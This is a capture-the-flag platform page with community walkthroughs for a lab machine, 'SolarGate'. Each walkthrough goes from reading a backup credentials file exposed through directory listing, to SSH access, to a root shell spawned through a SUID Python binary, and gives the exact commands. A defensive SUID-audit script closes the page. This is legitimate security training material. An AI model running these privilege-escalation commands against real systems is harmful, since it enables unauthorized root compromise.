πŸ€ 0 pts earned

SolarGate

Premium Machine (Locked)

SolarGate Energy's solar monitoring server has a misconfigured Python binary and a web service that's a little too helpful. Foothold first, SUID second.


Community

Community Hints

Grade A · 1000 pts Grade B · 700 pts Grade C · 400 pts Grade D · 200 pts + 150 credits on accept

Short, stage-specific nudges — directional, spoiler-light, no exact commands.

Privilege Escalation

Privilege Preservation Abuse suraj_pun_magar · D · 7 Jun 2026

Community

Community Walkthroughs

Grade A · 2500 pts Grade B · 1750 pts Grade C · 1000 pts Grade D · 500 pts + 300 credits on accept
h4ck3r1337 MOD C 7 Jun 2026
  1. nmap -sV -p 30605,30606 172.105.154.30

  2. 172.105.154.30:30606/backup/creds.txt

  3. ssh login .... cat user.txt

  4. nmap -sV -p 30605,30606 172.105.154.30 >>>>>> SimpleHTTPServer 0.6 (Python 3.8.10) >>>>>> /usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")' >>>>>>> root access

  5. cat /root/root.txt

suraj_pun_magar D 7 Jun 2026
  1. Reconnaissance (Port Scanning)

You start with:

  • SSH on non-standard port
  • HTTP SimpleHTTPServer

nmap -sV -p 30605,30606

Key findings:

  • 30605 → SSH (OpenSSH 8.2p1 Ubuntu)
  • 30606 → HTTP (Python SimpleHTTPServer)

Important insight:
This is a lab-style misconfiguration challenge, so HTTP is likely your entry point.

  2. Web Enumeration

Opening the HTTP service shows:

  • Directory listing enabled
  • Two main items: backup/ and index.txt

Why this matters:

Directory listing = information disclosure vulnerability

You now enumerate further:

curl http://:30606/backup/creds.txt

  3. Credential Discovery

Inside the backup directory, you find:

A credentials file containing:

  • username
  • password

Security issue:

This is a classic:

Sensitive data exposed in web-accessible backup directory

  4. Initial Access (SSH Login)

Use the leaked credentials:

ssh -p 30605 username@

After authentication:

  • You get a normal Linux shell
  • System is Ubuntu minimal install

  5. User Enumeration

Inside the home directory:

ls
cat user.txt

You confirm:

  • You have user-level access
  • No sudo privileges:

sudo -l

Result:

User is NOT allowed sudo

  6. Privilege Escalation Discovery

You search for SUID binaries:

find / -perm -4000 -type f 2>/dev/null
Critical finding:

Among standard binaries, you notice:

/usr/bin/python3.8 has SUID bit set

This is highly dangerous and unusual.

  7. Root Privilege Escalation (SUID Python Abuse)

Since Python runs with elevated privileges, you can spawn a shell:

/usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Why this works:

  • -p preserves privileges
  • Python inherits root effective UID due to SUID

  8. Root Access

Now you are:

Root user shell obtained

You verify by accessing:

/root/root.txt

Attack Chain Summary
Nmap scan
↓
HTTP directory listing
↓
backup creds found
↓
SSH login (user access)
↓
SUID enumeration
↓
Python SUID abuse
↓
Root shell

00x003 MOD A 1 Jun 2026

Walkthrough: SolarGate

Challenge Description:
A solar monitoring platform exposes a web service that is a little too helpful. Gain an initial foothold through exposed resources, then leverage a misconfigured SUID binary to obtain root access.


1. Enumeration

The initial Nmap scan reveals two open ports:

  • 30605/tcp – SSH
  • 30606/tcp – HTTP (Python SimpleHTTPServer)

nmap -sV -p 30605,30606 23.92.29.178

Output

PORT      STATE SERVICE VERSION
30605/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
30606/tcp open  http    SimpleHTTPServer 0.6 (Python 3.8.10)

Since the challenge description references a web service, the HTTP service is the primary target for further enumeration.


2. Web Enumeration

Request the root page:

curl -i http://23.92.29.178:30606/

Response

<title>Directory listing for /</title>

backup/
index.txt

The server has directory listing enabled, exposing a backup/ directory.


3. Credential Disclosure

Inspect files within the exposed backup directory:

curl http://23.92.29.178:30606/backup/creds.txt

Output

# SolarGate credential backup — DO NOT COMMIT
username=s...r
password=s....!

A credential backup file has been accidentally exposed through the web server.


4. Initial Access

Use the discovered credentials to authenticate via SSH.

ssh solar@23.92.29.178 -p 30605

Password:

s....!

Login is successful.


5. User Enumeration

List the contents of the user's home directory:

ls

Output

notes.txt
todo.txt
user.txt

Retrieve the user flag:

cat user.txt

User Flag

flag{...._...._...}

Review the remaining files for useful information:

cat notes.txt
cat todo.txt

notes.txt

Solar panel monitoring data archived daily.
Contact admin@solargate.local for access issues.

todo.txt

TODO: remove python suid flag — IT keeps using it for quick scripts. -- mgmt

The TODO note strongly suggests a privilege escalation path involving a SUID Python interpreter.


6. SUID Enumeration

Enumerate SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Relevant Output

/usr/bin/python3.8

A Python interpreter should never normally have the SUID bit set. This is likely the intended privilege escalation vector.


7. Verify SUID Python

Check the effective UID of the interpreter:

/usr/bin/python3.8 -c 'import os; print(os.geteuid())'

Output

0

The interpreter executes with root privileges.


8. Privilege Escalation

Spawn a root shell using the SUID Python binary:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash -p")'

Verify access:

id

Output

uid=0(root) gid=1000(solar) euid=0(root)

Root access has been obtained.


9. Capture Root Flag

Navigate to the root directory:

cd /root
ls

Output

root.txt

Read the flag:

cat root.txt

Root Flag

flag{...._...._...}

Flags

User

flag{...._...._...}

Root

flag{...._...._...}

Attack Path Summary

  1. Enumerated open services with Nmap.
  2. Identified an exposed Python HTTP server.
  3. Discovered directory listing was enabled.
  4. Accessed a backup directory containing credentials.
  5. Reused credentials to gain SSH access.
  6. Retrieved the user flag.
  7. Found a hint referencing a SUID Python interpreter.
  8. Enumerated SUID binaries and located /usr/bin/python3.8.
  9. Leveraged SUID Python to spawn a root shell.
  10. Retrieved the root flag.

Vulnerabilities Identified

  • Directory listing enabled on web server.
  • Sensitive backup files exposed over HTTP.
  • Plaintext credential storage.
  • Credential reuse between services.
  • Misconfigured SUID Python interpreter.
  • Direct privilege escalation to root.

Impact: Full compromise of the target system from anonymous web access to root privileges.
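As an added, defender-side example (not from any of the walkthroughs above and not the machine's own code): a POSIX sh audit that collects SUID files with the same find predicate the walkthroughs use, flags interpreters and shells such as /usr/bin/python3.8, and prints the chmod u-s remediation, applying it only when FIX=1 is set. The interpreter name pattern and the sample find output are constructed assumptions.

```shell
#!/bin/sh
# Added example, not part of the SolarGate walkthroughs. Audits SUID files and
# flags interpreters/shells, which must never carry the setuid bit: a SUID
# interpreter hands an effective UID of 0 to anyone who can run it.

# Assumed list of interpreter/shell basenames (constructed, extend as needed).
INTERPRETER_RE='^(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|php[0-9.]*|node|lua[0-9.]*|bash|sh|dash|zsh)$'

# Filter a newline-separated list of SUID paths down to the dangerous ones.
# Pure function over its argument so it can be exercised on constructed input.
flag_suid_interpreters() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=$(basename "$path")
        if printf '%s' "$base" | grep -Eq "$INTERPRETER_RE"; then
            printf '%s\n' "$path"
        fi
    done
    return 0
}

# Collect SUID files from the live system (same predicate as in the walkthroughs).
list_suid_files() {
    find / -xdev -perm -4000 -type f 2>/dev/null
}

# Print the remediation for each flagged path; run it only when FIX=1.
remediate() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf 'SUID interpreter: %s -> chmod u-s %s\n' "$path" "$path"
        if [ "${FIX:-0}" = 1 ]; then
            chmod u-s "$path"
        fi
    done
    return 0
}

# Constructed sample find output, shaped like the SolarGate result.
SAMPLE_SUID_LIST='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/python3.8
/usr/bin/su
/usr/lib/openssh/ssh-keysign'

if [ "${1:-}" = "--live" ]; then
    remediate "$(flag_suid_interpreters "$(list_suid_files)")"
else
    remediate "$(flag_suid_interpreters "$SAMPLE_SUID_LIST")"
fi
```

Run with `--live` on a host to audit the real filesystem; on the sample input it reports only /usr/bin/python3.8.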